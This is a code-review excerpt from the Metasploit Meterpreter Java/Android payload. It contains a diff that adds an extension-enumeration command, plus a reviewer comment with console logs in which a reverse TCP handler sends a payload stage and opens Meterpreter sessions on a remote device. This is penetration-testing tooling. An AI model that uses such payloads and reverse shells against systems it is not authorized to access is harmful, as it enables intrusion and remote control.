java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_enumextcmd.java

```diff
@@ -0,0 +1,26 @@
+package com.metasploit.meterpreter.core;
+
+import com.metasploit.meterpreter.CommandManager;
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class core_enumextcmd implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String command = request.getStringValue(TLVType.TLV_TYPE_STRING);
+        CommandManager commandManager = meterpreter.getCommandManager();
+        String[] commands = commandManager.getCommands();
+        for (String loadedCommand : commands) {
+            if (command.equals(loadedCommand.split("_")[0])) {
+                response.addOverflow(TLVType.TLV_TYPE_STRING, loadedCommand);
+            }
+        }
+        if ("android".equals(command)) {
```

Comment:
yeah, maybe as a second pass. this works well enough for now and is a lot less churn and api-breaking:

before:
```
[*] Started reverse TCP handler on 192.168.2.13:4444
[*] Starting the payload handler...
WARNING: Local file /Users/bcook/rapid7/metasploit-framework/data/android/metstage.jar is being used
WARNING: Local file /Users/bcook/rapid7/metasploit-framework/data/android/meterpreter.jar is being used
[*] Sending stage (63126 bytes) to 192.168.2.29
[*] Meterpreter session 1 opened (192.168.2.13:4444 -> 192.168.2.29:43598) at 2016-09-11 23:17:41 -0500
WARNING: Local file /Users/bcook/rapid7/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used

meterpreter > [-] Failed to load extension: No module of the name ext_server_android.jar found
```

after:
```
[*] Started reverse TCP handler on 192.168.2.13:4444
[*] Starting the payload handler...
[*] Sending stage (63320 bytes) to 192.168.2.29
[*] Meterpreter session 2 opened (192.168.2.13:4444 -> 192.168.2.29:38133) at 2016-09-11 23:20:49 -0500

meterpreter >
```